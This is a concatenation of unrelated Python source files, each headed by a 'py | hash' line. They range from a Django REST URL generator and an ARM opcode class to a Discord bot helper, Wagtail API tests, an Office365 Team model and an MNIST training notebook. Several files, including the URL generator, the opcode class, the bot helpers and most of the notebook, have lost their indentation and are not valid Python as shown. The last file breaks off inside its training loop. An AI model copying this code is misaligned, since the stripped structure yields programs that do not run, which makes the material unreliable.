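        # signature follows the documented form: callback(simulation, extra_arg1, ...)
        logger.info("%s: simulation iteration finished", label)

    run_tardis(
        "tardis_example.yml",  # hypothetical config path
        simulation_callbacks=[[_log_iteration, "demo"]],
    )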
|
py | b40415809a860788279afd159a6f5b787a8604c0 | from django.urls import path
from .views import AbstractJacAPIView
from .views import AbstractAdminJacAPIView, AbstractPublicJacAPIView
from jaseci.element.element import element
from jaseci_serv.base.models import super_master
from jaseci.utils.utils import copy_func
from inspect import signature
import uuid
import json
def rest_api_auto_doc(endpoint: str, fsig: signature):
"""
Automatically return string for REST Interface documentation
Parameters include endpoint uri and signature
"""
doc = f"**REST Endpoint**: {endpoint}\n"
params = []
json_samp = {}
for i in fsig.parameters.keys():
if (i == 'self'):
continue
p_name = i
p_type = fsig.parameters[i].annotation
if(issubclass(p_type, element)):
params.append(
f'> {p_name}: UUID pointing to {p_type.__name__} object\n')
json_samp[p_name] = uuid.uuid4().urn
else:
params.append(f'> {p_name}: type {p_type.__name__}\n')
json_samp[p_name] = p_type()
if (p_type == str):
json_samp[p_name] = 'some string'
if (params):
doc += "\n**Parameters**:\n"
for i in params:
doc += i
doc += "\n**JSON Example**\n"
doc += f"```javascript\n{json.dumps(json_samp, indent=4)}\n```\n"
return doc
generated_urls = []
def generate_apis(api_list, view_cls, dir_head):
"""
Auto generates Django APIs based on core interface
"""
for i in api_list:
fname = '_'.join(i['groups'])
apidocstr = f"{dir_head}/{fname}"
func_sig = i['sig']
gen_cls = type(fname,
(view_cls,),
{})
gen_cls.post = copy_func(gen_cls.post)
gen_cls.post.__doc__ = i['doc'] + '\n\n' + \
rest_api_auto_doc(apidocstr, func_sig)
globals()[fname] = gen_cls
global generated_urls
generated_urls.append(
path(apidocstr, globals()[fname].as_view(), name=fname))
generate_apis(super_master._public_api, AbstractPublicJacAPIView, 'public')
generate_apis(super_master._private_api, AbstractJacAPIView, 'jac')
generate_apis(super_master._admin_api, AbstractAdminJacAPIView, 'admin')
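# Editor's note (assumption, not part of the original file): the `path()` routes
# collected in `generated_urls` above are meant to be exposed through a Django
# URLConf, along the lines of:
#
#     urlpatterns = [
#         *generated_urls,
#     ]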
|
py | b40415dcd70661fe538dc6da6ed30cb50af41d72 | # ------------------------------------------------------------------------------
# CodeHawk Binary Analyzer
# Author: Henny Sipma
# ------------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2021 Aarno Labs LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ------------------------------------------------------------------------------
from typing import List, TYPE_CHECKING
from chb.app.InstrXData import InstrXData
from chb.arm.ARMDictionaryRecord import armregistry
from chb.arm.ARMOpcode import ARMOpcode, simplify_result
from chb.arm.ARMOperand import ARMOperand
import chb.util.fileutil as UF
from chb.util.IndexedTable import IndexedTableValue
if TYPE_CHECKING:
import chb.arm.ARMDictionary
@armregistry.register_tag("ASR", ARMOpcode)
class ARMArithmeticShiftRight(ARMOpcode):
"""Arithmetic shift right (immediate, register)
ASR{S}<c> <Rd>, <Rm>, #<imm>
    ASR{S}<c> <Rd>, <Rn>, <Rm>
tags[1]: <c>
args[0]: {S}
args[1]: index of op1 in armdictionary
args[2]: index of op2 in armdictionary
args[3]: index of op3 in armdictionary
args[4]: is-wide (thumb)
"""
def __init__(
self,
d: "chb.arm.ARMDictionary.ARMDictionary",
ixval: IndexedTableValue) -> None:
ARMOpcode.__init__(self, d, ixval)
self.check_key(2, 5, "ArithmeticShiftRight")
@property
def operands(self) -> List[ARMOperand]:
return [self.armd.arm_operand(i) for i in self.args[1:-1]]
def annotation(self, xdata: InstrXData) -> str:
"""xdata format: a:vxxxx .
vars[0]: lhs (Rd)
xprs[0]: rhs1 (Rm/Rn)
xprs[1]: rhs2 (Rm/imm)
xprs[2]: rhs1 >> rhs2 (syntactic)
xprs[3]: rhs1 >> rhs2 (simplified)
args[4]: is-wide (thumb)
"""
lhs = str(xdata.vars[0])
result = xdata.xprs[1]
rresult = xdata.xprs[2]
xresult = simplify_result(xdata.args[2], xdata.args[3], result, rresult)
return lhs + " := " + xresult
|
py | b40415f2eb625bd265817a1e03f651c3339ad79f | import logging
import os
import json
import disnake
import motor.motor_asyncio
import asyncio
from disnake.ext import commands
import views
config = json.load(open('config.json'))
async def handle_response(message: disnake.Message):
""" Handle auto responses """
for file in os.listdir('./responses'):
file_json = json.load(open('./responses/' + file))
for trigger in file_json['triggers']:
if trigger.lower() in message.content.lower():
return await message.reply(file_json['response'])
return
def setup_logging():
"""Sets up the logger"""
logger = logging.getLogger('disnake')
logger.setLevel(logging.DEBUG)
handler = logging.FileHandler(
filename='disnake.log', encoding='utf-8', mode='w')
handler.setFormatter(logging.Formatter(
'%(asctime)s:%(levelname)s:%(name)s: %(message)s'))
logger.addHandler(handler)
async def setup_database():
""" Setup mongo database """
print("Setting Up MongoDB!")
connection = motor.motor_asyncio.AsyncIOMotorClient(
config["mongoDB_connection_url"])
print("MongoDB Connection Successful!")
try:
db = connection[config["mongoDB_database_name"]]
print("MongoDB Checking database")
if db['genral_info'] is None:
print("MongoDB Database is not setup- EXITING")
exit(1)
print("MongoDB Database Loaded!")
except Exception as e:
print(f"MongoDB Failed to load database: {e}, EXIT.")
exit(1)
return db
async def init_ticket(ctx: commands.Context, channel: disnake.TextChannel, category: str, bot: disnake.Client):
"""Initialize a ticket"""
msg = await channel.send("Please describe your issue in less than 100 words. The request shall timeout in 180 seconds.")
try:
ans = await bot.wait_for('message', check=lambda m: m.author == ctx.author and m.channel == channel, timeout=180)
except asyncio.TimeoutError:
emb = disnake.Embed(
title=f"Ticket Number: {channel.name.split('-')[0]}",
description="None provided",
color=disnake.Color.green()
)
emb.set_footer(
text=f"Please wait for the support team to respond. If you already own a server on our paid plan, please type in {config['prefix']}serverinfo <support code> to help us resolve your issue faster!")
emb.set_author(name=ctx.author.name, icon_url=ctx.author.avatar.url)
else:
emb = disnake.Embed(
title=f"Ticket Number: {channel.name.split('-')[0]}",
description=ans.content,
color=disnake.Color.green()
)
emb.set_footer(
text=f"Please wait for the support team to respond. If you already own a server on our paid plan, please type in {config['prefix']}serverinfo <support code> to help us resolve your issue faster!")
emb.set_author(name=ctx.author.name, icon_url=ctx.author.avatar.url)
emb.add_field(name="Category", value=category)
if category == 'paid':
# TODO: CHECK IF THEY HAVE THE PAID USER ROLE! IF SO PING THE SUPPORT TEAM!
text = f"Priority Support"
else:
text = "If you want priority support, you can get a paid server!"
await channel.purge(limit=3)
await channel.send(content=text, embed=emb, view=views.close_button())
|
py | b40415feecfe8ccf29b1c406fa6eb8ca5a98b7e5 | def imgLookup(searchTerm):
import os
import sys
import time
from urllib import FancyURLopener
import urllib2
import simplejson
import cv2
import numpy as np
import urllib
searchTerm = searchTerm.replace(' ','%20')
#Please update this for the newer versions for Mozilla
class MyOpener(FancyURLopener):
version = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11'
myopener = MyOpener()
for i in range(0,1):
url = ('https://ajax.googleapis.com/ajax/services/search/images?' + 'v=1.0&q='+searchTerm+'&start='+str(i*1)+'&userip=MyIP')
request = urllib2.Request(url, None, {'Referer': 'testing'})
response = urllib2.urlopen(request)
results = simplejson.load(response)
data = results['responseData']
dataInfo = data['results']
for i in dataInfo:
req = urllib.urlopen(i['unescapedUrl'])
arr = np.asarray(bytearray(req.read()), dtype=np.uint8)
img = cv2.imdecode(arr,-1)
r = 200.0 / img.shape[1]
dim = (200, int(img.shape[0] * r))
resized = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)
cv2.imshow('Picture',resized)
if cv2.waitKey() & 0xff == 27:
quit()
time.sleep(2)
|
py | b4041706ae057e2818ecbf6e3f9729734b402469 | from test_plus import TestCase
class SitemapsTest(TestCase):
def test_sitemap_xml(self):
self.assertGoodView('sitemap')
|
py | b40417e955b41a8197ea63f0b72625bf69409887 | from src.connection.models.responseModel import ResponseModel
from requests.models import Response
from src.connection.client import Client
class ConnectionClient:
def __init__(self, client: Client) -> None:
self.client = client
def get(self, url):
response = self.client.get(url)
return self.handleConnectionStatus(response)
    def handleConnectionStatus(self, response: Response):
        if response.status_code == 200:
            # requests' Response exposes the payload via .text (it has no .body attribute)
            responseModel = ResponseModel(response.status_code, response.text)
            return responseModel
        if response.status_code == 404:
            # raising bare strings is invalid in Python 3; raise real exceptions instead
            raise LookupError("not found")
        if response.status_code == 500:
            raise RuntimeError("internal error")
        raise ConnectionError("offline")
|
py | b404184e31a3f80ff65a6697e65bf8c05371579d | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.
Copyright (C) 2017-2019 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
""" # noqa
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pipeline', '0003_auto_20180206_1955'),
]
operations = [
migrations.AlterField(
model_name='templatescheme',
name='unique_id',
field=models.CharField(unique=True, max_length=97, verbose_name='\u65b9\u6848\u552f\u4e00ID', blank=True),
),
]
|
py | b40418fc61832368bb037568ce8125571d354d62 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Nonce',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),
('nonce', models.CharField(max_length=128, unique=True)),
],
),
]
|
py | b40419371408b81e1cce2292f4e082c483d5d894 | import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Difference'] , ['Lag1Trend'] , ['Seasonal_DayOfWeek'] , ['AR'] ); |
py | b4041959b43e5ea5e77baf21e72090d17b15cdab | # armstrong no.#
# An Armstrong number equals the sum of its digits, each raised to the
# power of the digit count (e.g. 153 = 1**3 + 5**3 + 3**3).
num = int(input("enter the no."))
original = num
num_digits = len(str(num))
digit_power_sum = 0
while num > 0:
    digit = num % 10
    digit_power_sum += digit ** num_digits
    num //= 10
if digit_power_sum == original:
    print("armstrong no.", original)
else:
    # print the original input, not the loop variable (which is 0 by now)
    print("not armstrong no.", original)
|
py | b4041a92a9c412ef3640af85ece71e2a64957c2a | from office365.entity import Entity
from office365.runtime.queries.service_operation_query import ServiceOperationQuery
from office365.runtime.resource_path import ResourcePath
from office365.teams.channel import Channel
from office365.teams.channelCollection import ChannelCollection
from office365.teams.schedule import Schedule
from office365.teams.teamFunSettings import TeamFunSettings
from office365.teams.teamGuestSettings import TeamGuestSettings
from office365.teams.teamMemberSettings import TeamMemberSettings
from office365.teams.teamMessagingSettings import TeamMessagingSettings
from office365.teams.teamsAppInstallationCollection import TeamsAppInstallationCollection
from office365.teams.teamsAsyncOperationCollection import TeamsAsyncOperationCollection
class Team(Entity):
"""A team in Microsoft Teams is a collection of channel objects. A channel represents a topic, and therefore a
logical isolation of discussion, within a team. """
def __init__(self, context, resource_path=None, properties=None):
super().__init__(context, resource_path, properties)
self.memberSettings = TeamMemberSettings()
self.guestSettings = TeamGuestSettings()
self.messagingSettings = TeamMessagingSettings()
self.funSettings = TeamFunSettings()
@property
def displayName(self):
"""The name of the team."""
return self.properties.get('displayName', None)
@property
def description(self):
"""An optional description for the team."""
return self.properties.get('description', None)
@property
def classification(self):
"""An optional label. Typically describes the data or business sensitivity of the team.
Must match one of a pre-configured set in the tenant's directory."""
return self.properties.get('classification', None)
@property
def visibility(self):
"""The visibility of the group and team. Defaults to Public."""
return self.properties.get('visibility', None)
@property
def webUrl(self):
"""A hyperlink that will go to the team in the Microsoft Teams client. This is the URL that you get when
you right-click a team in the Microsoft Teams client and select Get link to team. This URL should be treated
as an opaque blob, and not parsed."""
return self.properties.get('webUrl', None)
@property
def createdDateTime(self):
"""Timestamp at which the team was created."""
return self.properties.get('createdDateTime', None)
@property
def channels(self):
"""The collection of channels & messages associated with the team."""
return self.properties.get('channels',
ChannelCollection(self.context, ResourcePath("channels", self.resource_path)))
@property
def primary_channel(self):
"""The general channel for the team."""
return self.properties.get('primaryChannel',
Channel(self.context, ResourcePath("primaryChannel", self.resource_path)))
@property
def schedule(self):
"""The schedule of shifts for this team."""
return self.properties.get('schedule',
Schedule(self.context, ResourcePath("schedule", self.resource_path)))
@property
def installedApps(self):
"""The apps installed in this team."""
return self.properties.get('installedApps',
TeamsAppInstallationCollection(self.context,
ResourcePath("installedApps", self.resource_path)))
@property
def operations(self):
"""The async operations that ran or are running on this team."""
        return self.properties.get('operations',
                                   TeamsAsyncOperationCollection(self.context,
                                                                 ResourcePath("operations", self.resource_path)))
def archive(self):
"""Archive the specified team. When a team is archived, users can no longer send or like messages on any
channel in the team, edit the team's name, description, or other settings, or in general make most changes to
the team. Membership changes to the team continue to be allowed. """
qry = ServiceOperationQuery(self, "archive")
self.context.add_query(qry)
return self
def unarchive(self):
"""Restore an archived team. This restores users' ability to send messages and edit the team, abiding by
tenant and team settings. """
qry = ServiceOperationQuery(self, "unarchive")
self.context.add_query(qry)
return self
def clone(self):
"""Create a copy of a team. This operation also creates a copy of the corresponding group. """
qry = ServiceOperationQuery(self, "clone")
self.context.add_query(qry)
return self
def set_property(self, name, value, persist_changes=True):
super(Team, self).set_property(name, value, persist_changes)
# fallback: determine whether resource path is resolved
if name == "id" and self._resource_path.segment == "team":
self._resource_path = ResourcePath(value, ResourcePath("teams"))
return self
|
py | b4041b238244e4783ae87c4f36f438949cadfcd1 | from django.test import RequestFactory, TestCase, override_settings
from django.utils.encoding import force_bytes
from wagtail.core.models import Site
from ..utils import FieldsParameterParseError, get_base_url, parse_boolean, parse_fields_parameter
class DynamicBaseUrl:
def __str__(self):
return 'https://www.example.com'
def __bytes__(self):
return force_bytes(self.__str__())
def decode(self, *args, **kwargs):
return self.__bytes__().decode(*args, **kwargs)
class TestGetBaseUrl(TestCase):
def setUp(self):
Site.objects.all().delete()
def prepare_site(self):
return Site.objects.get_or_create(
hostname='other.example.com',
port=8080,
root_page_id=1,
is_default_site=True,
)[0]
def clear_cached_site(self, request):
del request._wagtail_site
def test_get_base_url_unset(self):
self.assertIsNone(get_base_url())
def test_get_base_url_from_request(self):
# base url for siteless request should be None
request = RequestFactory().get('/')
self.assertIsNone(Site.find_for_request(request))
self.assertIsNone(get_base_url(request))
# base url for request with a site should be based on the site's details
site = self.prepare_site()
self.clear_cached_site(request)
self.assertEqual(site, Site.find_for_request(request))
self.assertEqual(get_base_url(request), 'http://other.example.com:8080')
# port 443 should indicate https without a port
site.port = 443
site.save()
self.clear_cached_site(request)
self.assertEqual(get_base_url(request), 'https://other.example.com')
# port 80 should indicate http without a port
site.port = 80
site.save()
self.clear_cached_site(request)
self.assertEqual(get_base_url(request), 'http://other.example.com')
@override_settings(WAGTAILAPI_BASE_URL='https://bar.example.com')
def test_get_base_url_prefers_setting(self):
request = RequestFactory().get('/')
site = self.prepare_site()
self.assertEqual(site, Site.find_for_request(request))
self.assertEqual(get_base_url(request), 'https://bar.example.com')
with override_settings(WAGTAILAPI_BASE_URL=None):
self.assertEqual(get_base_url(request), 'http://other.example.com:8080')
@override_settings(WAGTAILAPI_BASE_URL='https://bar.example.com')
def test_get_base_url_from_setting_string(self):
self.assertEqual(get_base_url(), 'https://bar.example.com')
@override_settings(WAGTAILAPI_BASE_URL=b'https://baz.example.com')
def test_get_base_url_from_setting_bytes(self):
self.assertEqual(get_base_url(), 'https://baz.example.com')
@override_settings(WAGTAILAPI_BASE_URL=DynamicBaseUrl())
def test_get_base_url_from_setting_object(self):
self.assertEqual(get_base_url(), 'https://www.example.com')
class TestParseFieldsParameter(TestCase):
# GOOD STUFF
def test_valid_single_field(self):
parsed = parse_fields_parameter('test')
self.assertEqual(parsed, [
('test', False, None),
])
def test_valid_multiple_fields(self):
parsed = parse_fields_parameter('test,another_test')
self.assertEqual(parsed, [
('test', False, None),
('another_test', False, None),
])
def test_valid_negated_field(self):
parsed = parse_fields_parameter('-test')
self.assertEqual(parsed, [
('test', True, None),
])
def test_valid_nested_fields(self):
parsed = parse_fields_parameter('test(foo,bar)')
self.assertEqual(parsed, [
('test', False, [
('foo', False, None),
('bar', False, None),
]),
])
def test_valid_star_field(self):
parsed = parse_fields_parameter('*,-test')
self.assertEqual(parsed, [
('*', False, None),
('test', True, None),
])
def test_valid_star_with_additional_field(self):
# Note: '*,test' is not allowed but '*,test(foo)' is
parsed = parse_fields_parameter('*,test(foo)')
self.assertEqual(parsed, [
('*', False, None),
('test', False, [
('foo', False, None),
]),
])
def test_valid_underscore_field(self):
parsed = parse_fields_parameter('_,test')
self.assertEqual(parsed, [
('_', False, None),
('test', False, None),
])
def test_valid_field_with_underscore_in_middle(self):
parsed = parse_fields_parameter('a_test')
self.assertEqual(parsed, [
('a_test', False, None),
])
def test_valid_negated_field_with_underscore_in_middle(self):
parsed = parse_fields_parameter('-a_test')
self.assertEqual(parsed, [
('a_test', True, None),
])
def test_valid_field_with_underscore_at_beginning(self):
parsed = parse_fields_parameter('_test')
self.assertEqual(parsed, [
('_test', False, None),
])
def test_valid_field_with_underscore_at_end(self):
parsed = parse_fields_parameter('test_')
self.assertEqual(parsed, [
('test_', False, None),
])
# BAD STUFF
def test_invalid_char(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test#')
self.assertEqual(str(e.exception), "unexpected char '#' at position 4")
def test_invalid_whitespace_before_identifier(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter(' test')
self.assertEqual(str(e.exception), "unexpected whitespace at position 0")
def test_invalid_whitespace_after_identifier(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test ')
self.assertEqual(str(e.exception), "unexpected whitespace at position 4")
def test_invalid_whitespace_after_comma(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test, test')
self.assertEqual(str(e.exception), "unexpected whitespace at position 5")
def test_invalid_whitespace_before_comma(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test ,test')
self.assertEqual(str(e.exception), "unexpected whitespace at position 4")
def test_invalid_unexpected_negation_operator(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test-')
self.assertEqual(str(e.exception), "unexpected char '-' at position 4")
def test_invalid_unexpected_open_bracket(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test,(foo)')
self.assertEqual(str(e.exception), "unexpected char '(' at position 5")
def test_invalid_unexpected_close_bracket(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test)')
self.assertEqual(str(e.exception), "unexpected char ')' at position 4")
def test_invalid_unexpected_comma_in_middle(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test,,foo')
self.assertEqual(str(e.exception), "unexpected char ',' at position 5")
def test_invalid_unexpected_comma_at_end(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test,foo,')
self.assertEqual(str(e.exception), "unexpected char ',' at position 9")
def test_invalid_unclosed_bracket(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test(foo')
self.assertEqual(str(e.exception), "unexpected end of input (did you miss out a close bracket?)")
def test_invalid_subfields_on_negated_field(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('-test(foo)')
self.assertEqual(str(e.exception), "unexpected char '(' at position 5")
def test_invalid_star_field_in_wrong_position(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test,*')
self.assertEqual(str(e.exception), "'*' must be in the first position")
def test_invalid_negated_star(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('-*')
self.assertEqual(str(e.exception), "'*' cannot be negated")
def test_invalid_star_with_nesting(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('*(foo,bar)')
self.assertEqual(str(e.exception), "unexpected char '(' at position 1")
def test_invalid_star_with_chars_after(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('*foo')
self.assertEqual(str(e.exception), "unexpected char 'f' at position 1")
def test_invalid_star_with_chars_before(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('foo*')
self.assertEqual(str(e.exception), "unexpected char '*' at position 3")
def test_invalid_star_with_additional_field(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('*,foo')
self.assertEqual(str(e.exception), "additional fields with '*' doesn't make sense")
def test_invalid_underscore_in_wrong_position(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('test,_')
self.assertEqual(str(e.exception), "'_' must be in the first position")
def test_invalid_negated_underscore(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('-_')
self.assertEqual(str(e.exception), "'_' cannot be negated")
def test_invalid_underscore_with_nesting(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('_(foo,bar)')
self.assertEqual(str(e.exception), "unexpected char '(' at position 1")
def test_invalid_underscore_with_negated_field(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('_,-foo')
self.assertEqual(str(e.exception), "negated fields with '_' doesn't make sense")
def test_invalid_star_and_underscore(self):
with self.assertRaises(FieldsParameterParseError) as e:
parse_fields_parameter('*,_')
self.assertEqual(str(e.exception), "'_' must be in the first position")
class TestParseBoolean(TestCase):
# GOOD STUFF
def test_valid_true(self):
parsed = parse_boolean('true')
self.assertEqual(parsed, True)
def test_valid_false(self):
parsed = parse_boolean('false')
self.assertEqual(parsed, False)
def test_valid_1(self):
parsed = parse_boolean('1')
self.assertEqual(parsed, True)
def test_valid_0(self):
parsed = parse_boolean('0')
self.assertEqual(parsed, False)
# BAD STUFF
def test_invalid(self):
with self.assertRaises(ValueError) as e:
parse_boolean('foo')
self.assertEqual(str(e.exception), "expected 'true' or 'false', got 'foo'")
def test_invalid_integer(self):
with self.assertRaises(ValueError) as e:
parse_boolean('2')
self.assertEqual(str(e.exception), "expected 'true' or 'false', got '2'")
|
py | b4041b4991d083a7508dc3d6611eaf3d68e4e6fc | # -*- coding: utf-8 -*-
"""EVA6-S3.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1SmU-_HVOF6eYhnFCPQJh-WueoB18H6hM
### **Check the Allotted Device Specs**
"""
# Commented out IPython shell command to ensure Python compatibility.
# !nvidia-smi
"""
###**Mount GDrive to Colab**"""
from google.colab import drive
drive.mount('/content/gdrive')
"""###**Load required modules**"""
# Commented out IPython magic to ensure Python compatibility.
from __future__ import print_function
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
import matplotlib.pyplot as plt
from torch.utils.data import Dataset
import random
from torchsummary import summary
import pandas as pd
from PIL import Image
import csv
import gzip
import numpy as np
import os
from torch.utils.tensorboard import SummaryWriter
import torchvision
# %load_ext tensorboard
"""###**Set Device and other Params**"""
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
GPU_BATCH_SIZE = 128
CPU_BATCH_SIZE = 64
NUM_WORKERS = 2
LR = 0.01
# Dataset related paths
dataset_path = '/content/gdrive/MyDrive/EVA6/MNIST/Dataset/'
train_data_path, test_data_path = 'train-images-idx3-ubyte.gz', 't10k-images-idx3-ubyte.gz'
train_labels_path, test_labels_path = 'train-labels-idx1-ubyte.gz', 't10k-labels-idx1-ubyte.gz'
"""###**Functions to Get Images and Labels**"""
def getimages(path: str):
"""
Opens gz dataset file and returns images
"""
if path.endswith('-idx3-ubyte.gz'):
with gzip.open(path) as dataset:
magic_num = int.from_bytes(dataset.read(4), 'big')
image_count = int.from_bytes(dataset.read(4), 'big')
row_count = int.from_bytes(dataset.read(4), 'big')
column_count = int.from_bytes(dataset.read(4), 'big')
images = np.frombuffer(dataset.read(), dtype=np.uint8).reshape(image_count, 1, row_count, column_count).astype(np.float32)
print('Images Shape: ', images.shape)
return images
def getlabels(path: str):
"""
Opens gz dataset file and returns labels
"""
if path.endswith('-idx1-ubyte.gz'):
with gzip.open(path) as dataset:
magic_number = int.from_bytes(dataset.read(4),'big')
label_count=int.from_bytes(dataset.read(4), 'big')
labels = np.frombuffer(dataset.read(), dtype=np.uint8).astype(np.longlong)
print('Labels Shape: ', labels.shape)
return labels
"""###**Data & Transformations**
"""
train_data = getimages(os.path.join(dataset_path, train_data_path))
train_labels = getlabels(os.path.join(dataset_path, train_labels_path))
test_data = getimages(os.path.join(dataset_path, test_data_path))
test_labels = getlabels(os.path.join(dataset_path, test_labels_path))
train_transforms=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
test_transforms=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,),(0.3081,))
])
"""###**Custom Dataset(MNIST + Random Number)**"""
class RandomMNIST(Dataset):
"""
Custom Dataset Class with 2 I/P & 2 O/P
"""
def __init__(self, data, labels):
self.data = data
self.random_num = np.ones(60000)
self.labels = labels
self.sum = np.ones(60000)
def __len__(self):
return len(self.data)
def __getitem__(self, index):
self.random_num[index] = np.random.randint(low=0, high=9,size=(1,))
self.sum[index]=int(self.random_num[index]) + self.labels[index]
# self.data[index] = np.expand_dims(self.data[index], axis=0)
return self.data[index], int(self.random_num[index]), self.labels[index], self.sum[index]
"""###**Get Data'Loader'**"""
def Data_To_Dataloader(trainset,testset,seed=1,batch_size=GPU_BATCH_SIZE, num_workers=NUM_WORKERS,pin_memory=True):
"""
Converts DataSet Object to DataLoader
"""
SEED = 1
cuda = torch.cuda.is_available()
torch.manual_seed(SEED)
if cuda:
torch.cuda.manual_seed(SEED)
dataloader_args = dict(shuffle=True, batch_size=GPU_BATCH_SIZE, num_workers=NUM_WORKERS, pin_memory=pin_memory) if cuda else dict(shuffle=True, batch_size=CPU_BATCH_SIZE)
trainloader = torch.utils.data.DataLoader(trainset, **dataloader_args)
testloader = torch.utils.data.DataLoader(testset, **dataloader_args)
return trainloader, testloader
train = RandomMNIST(train_data, train_labels)
test = RandomMNIST(test_data, test_labels)
trainloader, testloader = Data_To_Dataloader(train, test)
"""###**Finally the NeuralNet Class**"""
class Net(nn.Module):
"""
Simple NN Class which takes two inputs and returns two outputs
"""
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Sequential(
nn.Conv2d(in_channels=1, out_channels=32, kernel_size=(3,3), padding=0, bias=False),
nn.ReLU(),
nn.BatchNorm2d(32)
)
self.conv2 = nn.Sequential(
nn.Conv2d(in_channels=32, out_channels=64, kernel_size=(5,5), padding=0, bias=False),
nn.ReLU(),
nn.BatchNorm2d(64)
)
self.conv3 = nn.Sequential(
nn.Conv2d(in_channels=64, out_channels=128, kernel_size=(3,3), padding=0, bias=False),
nn.ReLU(),
nn.BatchNorm2d(128)
)
self.conv4 = nn.Sequential(
nn.Conv2d(in_channels=128, out_channels=32, kernel_size=(1,1), padding=0, bias=False),
nn.ReLU(),
nn.BatchNorm2d(32)
)
self.conv5 = nn.Sequential(
nn.Conv2d(in_channels=32, out_channels=64, kernel_size=(3,3), padding=1, bias=False)
)
self.conv6 = nn.Sequential(
nn.Conv2d(in_channels=64, out_channels=32, kernel_size=(3,3), padding=0, bias=False)
)
self.conv7 = nn.Sequential(
nn.Conv2d(in_channels=32, out_channels=10, kernel_size=(1,1), padding=0, bias=False)
)
self.gap=nn.AdaptiveAvgPool2d(1)
# self.pred_list=[]
def forward(self, input, rand_num):
x, num = input, rand_num
x = self.conv1(input)
x = self.conv2(x)
x = self.conv3(x)
maxpool_1 = F.max_pool2d(x, kernel_size=2, stride=2)
x = self.conv4(maxpool_1)
x=self.conv5(x)
x=self.conv6(x)
x=self.conv7(x)
x=self.gap(x)
x=x.view(-1,10)
max_arg_index=torch.argmax(F.log_softmax(x,dim=-1), dim=1)
labels=[i for i in range(0,10)]
final_pred=[labels[i] for i in max_arg_index]
return F.log_softmax(x, dim=-1), num
"""###**Train & Test Network**"""
net = Net()
model=net.to(torch.device("cuda"))
# set optimizer to Adam
optimizer=optim.Adam(model.parameters(), lr=LR)
# set loss func to CrossEntropy
criterion = nn.CrossEntropyLoss()
# Creating a tb instance of SummaryWriter
tb = SummaryWriter()
count=0
def correct_pred(pred,labels):
"""
Returns Sum of Correct Predictions
"""
return pred.argmax(dim=1).eq(labels).sum().item()
# Training & Testing Loop
for e in range(10):
train_loss, train_loss_item, train_correct=0,0, 0
test_loss, test_correct=0,0
print(f'Epoch:{e}')
# running model on train data
for batch in trainloader:
count+=1
images, rand_num, labels, sum = batch
